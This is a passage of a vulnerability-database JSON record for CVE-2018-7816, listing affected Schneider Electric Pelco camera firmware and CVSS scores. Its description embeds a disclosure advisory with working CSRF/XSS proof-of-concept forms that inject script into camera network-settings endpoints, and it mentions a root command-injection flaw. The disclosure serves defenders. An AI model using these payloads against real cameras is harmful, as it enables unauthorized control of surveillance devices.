"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixes1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixes1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe11_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe31_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe31:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7816",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-7816",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-15702",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-7816",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7816",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-15702",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-904",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file. Pelco Sarix Enhanced Camera Contains vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the lack of effective permissions and access control measures for network systems or products. An attacker could exploit the vulnerability to cause a system denial of service. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput 